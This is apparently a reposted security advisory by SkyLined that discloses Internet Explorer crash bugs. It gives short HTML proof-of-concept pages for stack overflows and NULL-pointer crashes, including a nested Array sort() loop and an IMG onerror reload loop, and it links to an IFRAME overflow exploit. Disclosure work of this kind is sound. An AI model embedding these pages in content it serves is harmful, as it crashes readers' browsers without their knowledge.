nested array sort() loop Stack overflow exception

文章作者：skylined@edup.tudelft.nl

Another flaw in IE:


<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>


Normally I would see if it&#39;s exploitable but I figure I&#39;m not MS&#39;s pet bug finder/analyser... So, I&#39;ve CC&#39;ed this message to Microsoft. I&#39;m sure they know their own product better then I do and can analyse the problem much faster. So if you want to know the impact of this vulnerability, ask them: I&#39;m sure they will be more then willing to help you. I&#39;m sure they will even reply to this message with technical details and a patch tomorrow.


Added to the list:

Current Internet Explorer DoS flaws:
nested array sort() loop Stack overflow exception:
<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

IMG.src, onerror loop Stack overflow exception:
<HTML>
  <BODY>
   <IMG src="::" onError="this.src=this.src;">
   <IMG src="::" onError="this.src=this.src;">
  </BODY>
</HTML>

Fixed Internet Explorer flaws:
Page-Enter, blendTrans() NULL-pointer exception:
<HTML style="width:expression(navigate(&#39;?#&#39;))">
  <HEAD>
   <META http-equiv="Page-Enter" content="blendTrans()">
  </HEAD>
</HTML>

"Object.method in for-loop" NULL-pointer exception:
<HTML>
  <SCRIPT language="javascript">
   for (a in window.open) { }
  </SCRIPT>
</HTML>

Links
InternetExploiter.html: Internet Explorer IFRAME src&name parameter BoF remote compromise advisory.
InternetExploiter.zip: Internet Explorer IFRAME src&name parameter BoF remote compromise exploit.

Copyright (C) 2002, 2004 Berend-Jan Wever <skylined@edup.tudelft.nl>